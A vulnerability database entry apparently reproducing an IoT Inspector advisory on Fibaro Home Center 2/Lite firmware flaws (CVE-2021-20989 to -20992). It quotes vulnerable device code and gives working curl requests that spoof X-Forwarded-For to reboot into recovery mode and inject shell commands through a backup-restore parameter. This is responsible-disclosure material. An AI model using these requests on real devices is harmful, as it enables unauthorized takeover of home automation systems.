Search

Find a vulnerability

Search criteria

    7 vulnerabilities by Fibaro

    VAR-202104-0467

    Vulnerability from variot - Updated: 2024-11-23 22:05

    Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using DNS spoofing attack and a device initiated remote port-forward channel can be used to connect to the web management interface. Knowledge of authorization credentials to the management interface is required to perform any further actions. IoT Inspector Research Lab Advisory IOT-20210408-0

    ~~~
    
                 title: Multiple vulnerabilities 
    
        vendor/product: Fibaro Home Center Light / Fibaro Home Center 2
    
                        https://www.fibaro.com/
    
    vulnerable version: 4.600 and older
    
         fixed version: 4.610
    
            CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, 
    
                        CVE-2021-20992
    
                impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    
                        9.8 (critical)
    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    
                        7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    
                        8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    
              reported: 2020-11-18
    
           publication: 2021-04-08
    
                    by: Marton Illes, IoT Inspector Research Lab
    
                        https://www.iot-inspector.com/
    
    
    
    
    
    
    
    Vendor description:
    
    -------------------
    
    "FIBARO is a global brand based on the Internet of Things technology. It 
    
    provides solutions for building and home automation. FIBARO's headquarters
    
    and factory are located in Wysogotowo, 3 miles away from Poznan. The company
    
    employs app. 
    
    
    IoT Inspector identified a disabled SSH host key check, which enables 
    
    man-in-the-middle attacks. 
    
    
    
    By initiating connections to the Fibaro cloud an attacker can eavesdrop on 
    
    communication between the user and the device. As communication inside the 
    
    SSH port-forward is not encrypted (see #4 on management interface), user 
    
    sessions, tokens and passwords can be hijacked. 
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode 
    
    (CVE-2021-20990)
    
    An internal management service is accessible on port 8000 and some API 
    
    endpoints could be accessed without authentication to trigger a shutdown, a 
    
    reboot, or a reboot into recovery mode. In recovery mode, an attacker can 
    
    upload firmware without authentication. (Potentially an earlier version with
    
    
    known remote command execution vulnerability, see #3)
    
    
    
    3) Authenticated remote command execution (versions before 4.550) 
    
    (CVE-2021-20991)
    
    An authenticated user can run commands as root user using a command
    injection 
    
    vulnerability. 
    
    Similar problems were also discovered by Pavel Cheremushkin from Kaspersky 
    
    ICS Cert: https://securelist.com/fibaro-smart-home/91416/
    
    
    
    4) Unencrypted management interface (CVE-2021-20992)
    
    Home Center devices provide a web based management interface over
    unencrypted 
    
    HTTP protocol. Communication between the user and the device can be 
    
    eavesdropped to hijack sessions, tokens, and passwords. The management 
    
    interface is only available over HTTP on the local network. The vendor 
    
    recommends using the cloud-based management interface, which is accessible
    over 
    
    HTTPS and requests are forwarded via an encrypted SSH connection between the
    
    
    Fibaro cloud and the device. 
    
    
    
    case "$1" in
    
      start)
    
    
    
                    ..... 
    
    
    
        # get IP
    
        local
    GET_IP_URL="https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria
    l}&HW_Key=${HW_Key}"
    
        local IP_Response; IP_Response=$(curl -f -s -S --retry 3
    --connect-timeout 100 --max-time 100 "${GET_IP_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
    
    
        # get PORT
    
        local
    GET_PORT_URL="https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S
    erial}&HW_Key=${HW_Key}"
    
        local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3
    --connect-timeout 100 --max-time 100 "${GET_PORT_URL}" | tr -d '
    !"#$%&|'"'"'|()*+,/:;<=>?@[|\\|]|^`|\||{}~')
    
    
    
                    .... 
    
    
    
        start-stop-daemon --start --background --pidfile "${PIDFILE}"
    --make-pidfile --startas /usr/bin/screen \
    
        -- -DmS ${NAME} ${DAEMON} -y -K 30 -i
    /etc/dropbear/dropbear_rsa_host_key -R "${PORT_Response}":localhost:80
    remote2@"${IP_Response}"
    
    </snip>
    
    
    
    The device uses dropbear ssh to initiate the connection; option -y disables
    any 
    
    host-key checks, voiding much of the otherwise added transport-layer
    security 
    
    by SSH: "Always accept hostkeys if they are unknown."
    
    
    
    The above "get IP" endpoint returns the address of the Fibaro cloud, e.g.: 
    
    lb-1.eu.ra.fibaro.com
    
    
    
    An attacker can use DNS spoofing or other means to intercept the connection. 
    By 
    
    using any hostkey, the attacker can successfully authenticate the SSH 
    
    connection. 
    
    
    
    A similar problem exists for remote support connections:
    
    
    
    ./opt/fibaro/scripts/remote-support.lua
    
    <snip>
    
    function handleResponse(response)
    
      responseJson = json.decode(response.data)
    
      print(json.encode(responseJson))
    
    
    
      local autoSSHCommand = 'ssh -y -K 30 -i
    /etc/dropbear/dropbear_rsa_host_key -R '  .. responseJson.private_ip..  ':'
    .. responseJson.port .. ':localhost:22 remote2@' .. responseJson.ip
    
      os.execute(autoSSHCommand)
    
    end
    
    
    
    function getSupportData()
    
      remoteUrl='https://dom.fibaro.com/get_support_route.php?PK_AccessPoint='
    .. serialNumber .. '&HW_Key=' .. HWKey
    
      print(remoteUrl)
    
    
    
      http = net.HTTPClient({timeout = 5000})
    
    
    
      http:request(remoteUrl, {
    
        options = {
    
          method = 'GET'
    
        },
    
        success = function(response)
    
          handleResponse(response)
    
        end,
    
        error = function(error)
    
          print(error)
    
        end
    
      })
    
    end
    
    
    
    getSupportData()
    
    </snip>
    
    
    
    Here, the remote support endpoint returns the following data:
    
    {"ip":"fwd-support.eu.ra.fibaro.com","port":"XXXXX","private_ip":"10.100.YYY
    .ZZZ"}
    
    
    
    The same dropbear ssh client is used with option -y. In this case, port 22 
    
    (ssh) is made accessible through the port-forward. However, the device only 
    
    allows public key authentication with a hard-coded SSH key. No further
    testing 
    
    has been done on compromising the support SSH connection. 
    
    
    
    
    
    2) Unauthenticated access to shutdown, reboot and reboot to recovery mode
    
    
    
    The device is running a nginx server, which forwards some requests to a 
    
    lighttpd server (8000) for further processing:
    
    <snip>
    
                                    proxy_set_header X-Forwarded-For
    $proxy_add_x_forwarded_for;
    
    
    
            location ~* \.php$ {
    
                proxy_pass   http://127.0.0.1:8000;
    
            }
    
    
    
            location ~* \.php\?.* {
    
                proxy_pass   http://127.0.0.1:8000;
    
            }
    
    </snip>
    
    
    
    The lighttpd server is not only accessible locally, but also via the local 
    
    network. 
    
    
    
    Authentication and authorization is implemented in PHP and there is a
    special 
    
    check for connections originating from within the host. However, when
    checking 
    
    the remote IP address, the header X-Forwarded-For is also considered:
    
    
    
    ./var/www/authorize.php
    
    <snip>
    
    function isLocalRequest()
    
    {
    
        $ipAddress = "";
    
        if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) 
    
            $ipAddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
    
        else
    
            $ipAddress = $_SERVER['REMOTE_ADDR'];
    
    
    
        $whitelist = array( '127.0.0.1', '::1' );
    
        if(in_array($ipAddress, $whitelist))
    
            return true;
    
    
    
        return false;
    
    }
    
    </snip>
    
    
    
    As the lighttpd service available via the network, an attacked can inject
    the 
    
    required header X-Forwarded-For as well. 
    
    
    
    The check isLocalRequest is used to "secure" multiple endpoints:
    
    
    
    ./var/www/services/system/shutdown.php
    
    <snip>
    
    <?php
    
        require_once("../../authorize.php");
    
    
    
        if (!isLocalRequest() && !isAuthorized())
    
        {
    
           sendUnauthorized();
    
        }
    
        else
    
        {
    
            exec("systemShutdown");
    
        }
    
    ?>
    
    </snip>
    
    
    
    ./var/www/services/system/reboot.php
    
    <snip>
    
    
    
    function authorize() 
    
    {
    
        return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,
    role::INSTALLER));
    
    }
    
    
    
    function handlePOST($text)
    
    {
    
        if (!isLocalRequest() && !authorize())
    
        {
    
           sendUnauthorized();
    
           return;
    
        }
    
    
    
        $params = tryDecodeJson($text);
    
        if(!is_null($params) && isset($params->recovery) && $params->recovery
    === true)
    
            exec("rebootToRecovery");
    
        else
    
            exec("systemReboot");
    
    }
    
    
    
    $requestBody = file_get_contents('php://input');
    
    $requestMethod = $_SERVER['REQUEST_METHOD'];
    
    
    
    if ($requestMethod == "POST") 
    
        handlePOST($requestBody);
    
    else 
    
        setStatusMethodNotAllowed();
    
    
    
    </snip>
    
    
    
    An attacker can issue the the following HTTP request to reboot the device
    into 
    
    recovery mode:
    
    curl -H 'X-Forwarded-For: 127.0.0.1' -H 'Content-Type: application/json' -d
    '{"recovery":true}'  http://DEVICE:8000/services/system/reboot.php
    
    
    
    In recovery mode, firmware images can be updated without authentication. 
    
    
    
    
    
    3) Authenticated remote command execution (versions before 4.550)
    
    
    
    Backup & restore operations could be triggered though HTTP endpoints:
    
    
    
    ./var/www/services/system/backups.php
    
    <snip>
    
    function restoreBackup($params)
    
    {
    
        if (getNumberOfInstances('{screen} SCREEN -dmS RESTORE') > 0)
    
        {
    
            setStatusTooManyRequests();
    
            return;
    
        }
    
    
    
        $type = $params->type;
    
        $id = $params->id;
    
        $version = $params->version;
    
    
    
        if (is_null($id) || !is_numeric($id) || $id < 1 ) 
    
        {
    
            setStatusBadRequest();
    
            return;
    
        }
    
    
    
        $hcVersion = exec("cat /mnt/hw_data/serial | cut -c1-3");
    
    
    
        if ($type == "local" && $hcVersion == "HC2" || $type == "remote") 
    
        {
    
            $version ?
    
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
    $id . ' ' . $version) :
    
                    exec('screen -dmS RESTORE restoreBackup.sh --' . $type. ' '. 
    $id);
    
        }
    
        else 
    
        {
    
            setStatusBadRequest();
    
            return;
    
        }
    
    
    
        setStatusAccepted();
    
    }
    
    </snip>
    
    
    
    The parameter $version is not sanitized or escaped, which allows an attacker
    to 
    
    inject shell commands into the exec() call:
    
    
    
    cat > /tmp/exploit <<- EOM
    
    {"action": "restore", "params": {"type": "remote", "id": 1, "version": "1;
    INJECTED COMMAND"}}
    
    EOM
    
    
    
    curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' -H 'content-type:
    application/json' -d@/tmp/exploit  http://DEVICE/services/system/backups.php
    
    
    
    
    Version 4.550 and later have proper escaping:
    
    <snip>
    
        $version = escapeshellarg($params->version);
    
    </snip>
    
    
    
    
    
    4) Unencrypted management interface
    
    
    
    NMMAP shows a few open ports on the box:
    
    PORT     STATE SERVICE
    
    22/tcp   open  ssh
    
    80/tcp   open  http
    
    8000/tcp open  http-alt
    
    
    
    Both 80/tcp and 8000/tcp can be accessed over unencrypted HTTP. 
    
    
    
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    

    Vulnerable / tested versions:


    Vulnerabilities 1, 2, 4 were confirmed on 4.600, which was the latest version

    at the time of the discovery

    Vulnerabilities 1, 2, 3, 4 were confirmed on 4.540, 4.530

    Solution:


    Upgrade to the version 4.610 or latest version, which fixes vulnerabilities 1,

    2 and 3.

    Vulnerability 4 is not fixed as the vendor assumes that the local network is

    trusted and the device only provides wired network access. Furthermore, the

    vendor recommends using the cloud-based management interface, which is

    accessible over HTTPS and requests are forwarded via an encrypted SSH

    connection between the Fibaro cloud and the device.

    Advisory URL:


    https://www.iot-inspector.com/blog/advisory-fibaro-home-center/

    Vendor contact timeline:


    2020-11-18: Contacting Fibaro through support@fibaro.com,

            support-usa@fibaro.com, info@fibaro.com, recepcja@fibargroup.com
    

    2020-11-23: Contacting Fibaro on Facebook & LinkedIn, got response on LinkedIn

    2020-11-24: Adivsory sent to Fibaro by email

    2020-12-01: Fibaro confirmed the receipt of the advisory

    2021-02-02: Meeting with Fibaro to discuss the vulnerabilities and fixes

    2021-03-16: Fibaro beta release (4.601) with the fixes

    2021-03-24: Fibaro applies for CVE numbers

    2021-03-31: Fibaro GA release (4.610) with the fix

    2021-04-08: IoT Inspector Research Lab publishes advisory

    ~~~
    
    
    
    The IoT Inspector Research Lab is an integrated part of IoT Inspector. 
    
    
    
    IoT Inspector is a platform for automated security analysis and compliance 
    
    checks of IoT firmware. Our mission is to secure the Internet of Things. In 
    
    order to discover vulnerabilities and vulnerability patterns within IoT
    devices
    
    and to further enhance automated identification that allows for scalable 
    
    detection within IoT Inspector, we conduct excessive security research in
    the
    
    area of IoT. 
    
    
    
    Whenever the IoT Inspector Research Lab discovers vulnerabilities in IoT 
    
    firmware, we aim to responsibly disclose relevant information to the vendor
    
    of the affected IoT device as well as the general public in a way that 
    
    minimizes potential harm and encourages further security analyses of IoT 
    
    systems. 
    
    
    
    You can find our responsible disclosure policy here:
    
    https://www.iot-inspector.com/responsible-disclosure-policy/
    
    
    
    
    
    

    ~~~

    Interested in using IoT Inspector for your research or product?

    Mail: research at iot-inspector dot com

    Web: https://www.iot-inspector.com

    Blog: https://www.iot-inspector.com/blog/

    Twitter: https://twitter.com/iotinspector

    EOF Marton Illes / @2021

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0467",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "home center lite",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.600"
          },
          {
            "model": "home center 2",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "fibaro",
            "version": "4.600"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Marton Illes",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-20989",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2021-20989",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2021-20989",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-20989",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "info@cert.vde.com",
                "id": "CVE-2021-20989",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-1328",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-20989",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-20989"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-1328"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-20989"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Fibaro Home Center 2 and Lite devices with firmware version 4.600 and older initiate SSH connections to the Fibaro cloud to provide remote access and remote support capabilities. This connection can be intercepted using DNS spoofing attack and a device initiated remote port-forward channel can be used to connect to the web management interface. Knowledge of authorization credentials to the management interface is required to perform any further actions. IoT Inspector Research Lab Advisory IOT-20210408-0\n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n             title: Multiple vulnerabilities \n\n    vendor/product: Fibaro Home Center Light / Fibaro Home Center 2\n\n                    https://www.fibaro.com/\n\nvulnerable version: 4.600 and older\n\n     fixed version: 4.610\n\n        CVE number: CVE-2021-20989, CVE-2021-20990, CVE-2021-20991, \n\n                    CVE-2021-20992\n\n            impact: 8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    9.8 (critical)\nCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n                    7.2 (high) CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n\n                    8.1 (high) CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n          reported: 2020-11-18\n\n       publication: 2021-04-08\n\n                by: Marton Illes, IoT Inspector Research Lab\n\n                    https://www.iot-inspector.com/\n\n \n\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n~~~\n\n \n\nVendor description:\n\n-------------------\n\n\"FIBARO is a global brand based on the Internet of Things technology. It \n\nprovides solutions for building and home automation. FIBARO\u0027s headquarters\n\nand factory are located in Wysogotowo, 3 miles away from Poznan. The company\n\nemploys app. \n\n\nIoT Inspector identified a disabled SSH host key check, which enables \n\nman-in-the-middle attacks. \n\n \n\nBy initiating connections to the Fibaro cloud an attacker can eavesdrop on \n\ncommunication between the user and the device. As communication inside the \n\nSSH port-forward is not encrypted (see #4 on management interface), user \n\nsessions, tokens and passwords can be hijacked. \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode \n\n(CVE-2021-20990)\n\nAn internal management service is accessible on port 8000 and some API \n\nendpoints could be accessed without authentication to trigger a shutdown, a \n\nreboot, or a reboot into recovery mode. In recovery mode, an attacker can \n\nupload firmware without authentication. (Potentially an earlier version with\n\n\nknown remote command execution vulnerability, see #3)\n\n \n\n3) Authenticated remote command execution (versions before 4.550) \n\n(CVE-2021-20991)\n\nAn authenticated user can run commands as root user using a command\ninjection \n\nvulnerability. \n\nSimilar problems were also discovered by Pavel Cheremushkin from Kaspersky \n\nICS Cert: https://securelist.com/fibaro-smart-home/91416/\n\n \n\n4) Unencrypted management interface (CVE-2021-20992)\n\nHome Center devices provide a web based management interface over\nunencrypted \n\nHTTP protocol. Communication between the user and the device can be \n\neavesdropped to hijack sessions, tokens, and passwords. The management \n\ninterface is only available over HTTP on the local network. The vendor \n\nrecommends using the cloud-based management interface, which is accessible\nover \n\nHTTPS and requests are forwarded via an encrypted SSH connection between the\n\n\nFibaro cloud and the device. \n\n \n\ncase \"$1\" in\n\n  start)\n\n    \n\n                ..... \n\n \n\n    # get IP\n\n    local\nGET_IP_URL=\"https://dom.fibaro.com/get_ssh_ip.php?PK_AccessPoint=${HC2_Seria\nl}\u0026HW_Key=${HW_Key}\"\n\n    local IP_Response; IP_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_IP_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n    # get PORT\n\n    local\nGET_PORT_URL=\"https://dom.fibaro.com/get_ssh_port.php?PK_AccessPoint=${HC2_S\nerial}\u0026HW_Key=${HW_Key}\"\n\n    local PORT_Response; PORT_Response=$(curl -f -s -S --retry 3\n--connect-timeout 100 --max-time 100 \"${GET_PORT_URL}\" | tr -d \u0027\n!\"#$%\u0026|\u0027\"\u0027\"\u0027|()*+,/:;\u003c=\u003e?@[|\\\\|]|^`|\\||{}~\u0027)\n\n \n\n                .... \n\n                \n\n    start-stop-daemon --start --background --pidfile \"${PIDFILE}\"\n--make-pidfile --startas /usr/bin/screen \\\n\n    -- -DmS ${NAME} ${DAEMON} -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \"${PORT_Response}\":localhost:80\nremote2@\"${IP_Response}\"\n\n\u003c/snip\u003e\n\n \n\nThe device uses dropbear ssh to initiate the connection; option -y disables\nany \n\nhost-key checks, voiding much of the otherwise added transport-layer\nsecurity \n\nby SSH: \"Always accept hostkeys if they are unknown.\"\n\n \n\nThe above \"get IP\" endpoint returns the address of the Fibaro cloud, e.g.: \n\nlb-1.eu.ra.fibaro.com\n\n \n\nAn attacker can use DNS spoofing or other means to intercept the connection. \nBy \n\nusing any hostkey, the attacker can successfully authenticate the SSH \n\nconnection. \n\n \n\nA similar problem exists for remote support connections:\n\n \n\n./opt/fibaro/scripts/remote-support.lua\n\n\u003csnip\u003e\n\nfunction handleResponse(response)\n\n  responseJson = json.decode(response.data)\n\n  print(json.encode(responseJson))\n\n \n\n  local autoSSHCommand = \u0027ssh -y -K 30 -i\n/etc/dropbear/dropbear_rsa_host_key -R \u0027  .. responseJson.private_ip..  \u0027:\u0027\n.. responseJson.port .. \u0027:localhost:22 remote2@\u0027 .. responseJson.ip\n\n  os.execute(autoSSHCommand)\n\nend\n\n \n\nfunction getSupportData()\n\n  remoteUrl=\u0027https://dom.fibaro.com/get_support_route.php?PK_AccessPoint=\u0027\n.. serialNumber .. \u0027\u0026HW_Key=\u0027 .. HWKey\n\n  print(remoteUrl)\n\n \n\n  http = net.HTTPClient({timeout = 5000})\n\n \n\n  http:request(remoteUrl, {\n\n    options = {\n\n      method = \u0027GET\u0027\n\n    },\n\n    success = function(response)\n\n      handleResponse(response)\n\n    end,\n\n    error = function(error)\n\n      print(error)\n\n    end\n\n  })\n\nend\n\n \n\ngetSupportData()\n\n\u003c/snip\u003e\n\n \n\nHere, the remote support endpoint returns the following data:\n\n{\"ip\":\"fwd-support.eu.ra.fibaro.com\",\"port\":\"XXXXX\",\"private_ip\":\"10.100.YYY\n.ZZZ\"}\n\n \n\nThe same dropbear ssh client is used with option -y. In this case, port 22 \n\n(ssh) is made accessible through the port-forward. However, the device only \n\nallows public key authentication with a hard-coded SSH key. No further\ntesting \n\nhas been done on compromising the support SSH connection. \n\n \n\n \n\n2) Unauthenticated access to shutdown, reboot and reboot to recovery mode\n\n \n\nThe device is running a nginx server, which forwards some requests to a \n\nlighttpd server (8000) for further processing:\n\n\u003csnip\u003e\n\n                                proxy_set_header X-Forwarded-For\n$proxy_add_x_forwarded_for;\n\n                                \n\n        location ~* \\.php$ {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n \n\n        location ~* \\.php\\?.* {\n\n            proxy_pass   http://127.0.0.1:8000;\n\n        }\n\n\u003c/snip\u003e\n\n \n\nThe lighttpd server is not only accessible locally, but also via the local \n\nnetwork. \n\n \n\nAuthentication and authorization is implemented in PHP and there is a\nspecial \n\ncheck for connections originating from within the host. However, when\nchecking \n\nthe remote IP address, the header X-Forwarded-For is also considered:\n\n \n\n./var/www/authorize.php\n\n\u003csnip\u003e\n\nfunction isLocalRequest()\n\n{\n\n    $ipAddress = \"\";\n\n    if(!empty($_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027])) \n\n        $ipAddress = $_SERVER[\u0027HTTP_X_FORWARDED_FOR\u0027];\n\n    else\n\n        $ipAddress = $_SERVER[\u0027REMOTE_ADDR\u0027];\n\n \n\n    $whitelist = array( \u0027127.0.0.1\u0027, \u0027::1\u0027 );\n\n    if(in_array($ipAddress, $whitelist))\n\n        return true;\n\n \n\n    return false;\n\n}\n\n\u003c/snip\u003e\n\n \n\nAs the lighttpd service available via the network, an attacked can inject\nthe \n\nrequired header X-Forwarded-For as well. \n\n \n\nThe check isLocalRequest is used to \"secure\" multiple endpoints:\n\n \n\n./var/www/services/system/shutdown.php\n\n\u003csnip\u003e\n\n\u003c?php\n\n    require_once(\"../../authorize.php\");\n\n \n\n    if (!isLocalRequest() \u0026\u0026 !isAuthorized())\n\n    {\n\n       sendUnauthorized();\n\n    }\n\n    else\n\n    {\n\n        exec(\"systemShutdown\");\n\n    }\n\n?\u003e\n\n\u003c/snip\u003e\n\n \n\n./var/www/services/system/reboot.php\n\n\u003csnip\u003e\n\n \n\nfunction authorize() \n\n{\n\n    return isAuthorized() || isAuthorizedFibaroAuth(array(role::USER,\nrole::INSTALLER));\n\n}\n\n \n\nfunction handlePOST($text)\n\n{\n\n    if (!isLocalRequest() \u0026\u0026 !authorize())\n\n    {\n\n       sendUnauthorized();\n\n       return;\n\n    }\n\n \n\n    $params = tryDecodeJson($text);\n\n    if(!is_null($params) \u0026\u0026 isset($params-\u003erecovery) \u0026\u0026 $params-\u003erecovery\n=== true)\n\n        exec(\"rebootToRecovery\");\n\n    else\n\n        exec(\"systemReboot\");\n\n}\n\n \n\n$requestBody = file_get_contents(\u0027php://input\u0027);\n\n$requestMethod = $_SERVER[\u0027REQUEST_METHOD\u0027];\n\n \n\nif ($requestMethod == \"POST\") \n\n    handlePOST($requestBody);\n\nelse \n\n    setStatusMethodNotAllowed();\n\n \n\n\u003c/snip\u003e\n\n \n\nAn attacker can issue the the following HTTP request to reboot the device\ninto \n\nrecovery mode:\n\ncurl -H \u0027X-Forwarded-For: 127.0.0.1\u0027 -H \u0027Content-Type: application/json\u0027 -d\n\u0027{\"recovery\":true}\u0027  http://DEVICE:8000/services/system/reboot.php\n\n \n\nIn recovery mode, firmware images can be updated without authentication. \n\n \n\n \n\n3) Authenticated remote command execution (versions before 4.550)\n\n \n\nBackup \u0026 restore operations could be triggered though HTTP endpoints:\n\n \n\n./var/www/services/system/backups.php\n\n\u003csnip\u003e\n\nfunction restoreBackup($params)\n\n{\n\n    if (getNumberOfInstances(\u0027{screen} SCREEN -dmS RESTORE\u0027) \u003e 0)\n\n    {\n\n        setStatusTooManyRequests();\n\n        return;\n\n    }\n\n \n\n    $type = $params-\u003etype;\n\n    $id = $params-\u003eid;\n\n    $version = $params-\u003eversion;\n\n \n\n    if (is_null($id) || !is_numeric($id) || $id \u003c 1 ) \n\n    {\n\n        setStatusBadRequest();\n\n        return;\n\n    }\n\n \n\n    $hcVersion = exec(\"cat /mnt/hw_data/serial | cut -c1-3\");\n\n \n\n    if ($type == \"local\" \u0026\u0026 $hcVersion == \"HC2\" || $type == \"remote\") \n\n    {\n\n        $version ?\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id . \u0027 \u0027 . $version) :\n\n                exec(\u0027screen -dmS RESTORE restoreBackup.sh --\u0027 . $type. \u0027 \u0027. \n$id);\n\n    }\n\n    else \n\n    {\n\n        setStatusBadRequest();\n\n        